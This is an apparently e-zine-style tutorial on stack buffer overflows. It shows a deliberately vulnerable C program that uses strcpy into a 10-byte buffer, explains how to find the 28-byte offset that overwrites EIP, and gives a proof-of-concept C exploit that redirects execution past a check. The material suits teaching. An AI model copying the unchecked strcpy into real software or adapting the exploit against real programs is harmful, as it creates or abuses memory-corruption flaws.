What is a buffer overflow?
It happens when more data is written to a buffer than it can hold or was FIXED to hold.While trying to exploit an application, you try to gain control over the flow of the program and the registers.The registers are the EAX,EBX,ECX,EDX,ESI and EDI. (Ofcourse also the EIP)
In this tutorial, you're going to try and control the EIP register.
The EIP (Extended instruction pointer) register holds the address of the next instruction to be executed.
The ESP (Extended stack pointer) register points to the top of the stack.
The EBP (Extended base pointer) holds the address of the stack frame.
As you know, if we control the EIP we can point where our location of the next command is going to be.
We'll take a simple vulnerable application:
Code:
#include
#include
#include
int test(char *vuln) {
char string[10]; // Can hold 10
strcpy(string, vuln); //Vuln lies here....if we pass more than what it can hold it overflows
return 1;
}
int main(int argc, char *hy[]) {
int ok;
ok=0; //It is 0 by default, you have to bypass this
test(hy[1]);
if (ok == 0) {
printf("DaSteem/h4cky0u.org\n");
printf("Say H4cky0u.org Pwnz\n");
printf("This simple prog was written for the eZine #1\n");
printf("Get past this and you've done it!");
} else {
printf("You passed the app. Great job!!!"); //You can easily get here = D
return 1;
}
}
As you can see, strcpy copies more to string than it can hold so it overflows.
Now, as we want to gain control over the EIP we start passing more chars than it can hold.
So we run the application as Vulnapp.exe AAAAAAAAAAAAAAAAAAAA and so on..
And we keep incrementing until the offset gets overwritten with 41's (Click on More info to check)
The hex character of A is 41 so we know its overwritten.
Now we count the number of A's before the first part was overwritten.
It's 28 in this case and the next 4 overwrite the EIP.
So its vulnapp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAA
After this, the EIP is overwritten, now lets take a close look at the source of our application:
The POC:
Code:
#include
#include
#include
int main()
{
char bypass[] = "\x29\x13\x40"; //Our location after the JNZ <-- (00's are skipped)
char location[500] = "D:\\VulnApp.exe "; //Path to app, leave space for exploitation
printf("h4cky0u.org eZine #1 Exploiter \n");
char overflow[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"; //Number of A's before EIP is overwritten
strcat(location,overflow); //Copies the A's to our vuln
strcat(location,bypass); //Copies our new EIP to the vuln
WinExec(location, 0); //Executes with parameters
return 0;
}
I know its messy, but it works.
This should make it say you passed the app!
This is the end, short but suits a zine...you might want to read on shellcodes,nopsleds, etc etc...
ليست هناك تعليقات:
إرسال تعليق